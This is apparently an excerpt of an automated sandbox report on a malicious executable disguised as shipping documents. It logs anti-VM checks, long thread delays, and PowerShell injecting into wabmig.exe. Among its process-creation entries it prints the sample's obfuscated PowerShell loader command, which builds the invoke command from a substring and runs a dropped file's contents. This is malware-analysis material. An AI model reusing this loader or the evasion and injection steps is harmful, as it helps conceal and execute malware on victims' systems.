            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Switches to a custom stack to bypass stack traces
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeAPI/Special instruction interceptor: Address: 4EFF475
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: 830000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: 24150000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: 23FA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599888Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599342Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599016Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598216Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597117Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596888Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596782Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596559Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596232Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595907Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595782Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595657Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595532Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595063Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594938Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594469Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594346Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6496Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3236Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWindow / User API: threadDelayed 3352Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWindow / User API: threadDelayed 6477Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5276Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -24903104499507879s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 4592Thread sleep count: 3352 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -599888s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 4592Thread sleep count: 6477 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -599563s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -599342s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -599016s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -598797s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -598688s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -598563s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -598216s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -598110s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -597985s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -597860s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -597735s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -597117s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -597000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -596888s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -596782s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -596672s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -596559s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -596453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -596344s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -596232s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -596125s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -596015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -595907s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -595782s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -595657s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -595532s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -595407s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -595188s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -595063s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -594938s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -594813s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -594688s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -594578s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -594469s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 6948Thread sleep time: -594346s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599888Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599342Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599016Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598216Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597117Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596888Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596782Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596559Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596232Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595907Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595782Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595657Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595532Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595063Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594938Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594469Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594346Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: wabmig.exe, 00000008.00000002.3381693291.00000000086D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
            Source: wabmig.exe, 00000008.00000002.3381693291.000000000872F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wabmig.exe, 00000008.00000002.3381693291.00000000086D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeAPI call chain: ExitProcess graph end nodegraph_0-3784
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeAPI call chain: ExitProcess graph end nodegraph_0-3789
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04247810 LdrInitializeThunk,2_2_04247810
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 3AF0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 83FBE0Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_6FE81096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,0_2_6FE81096
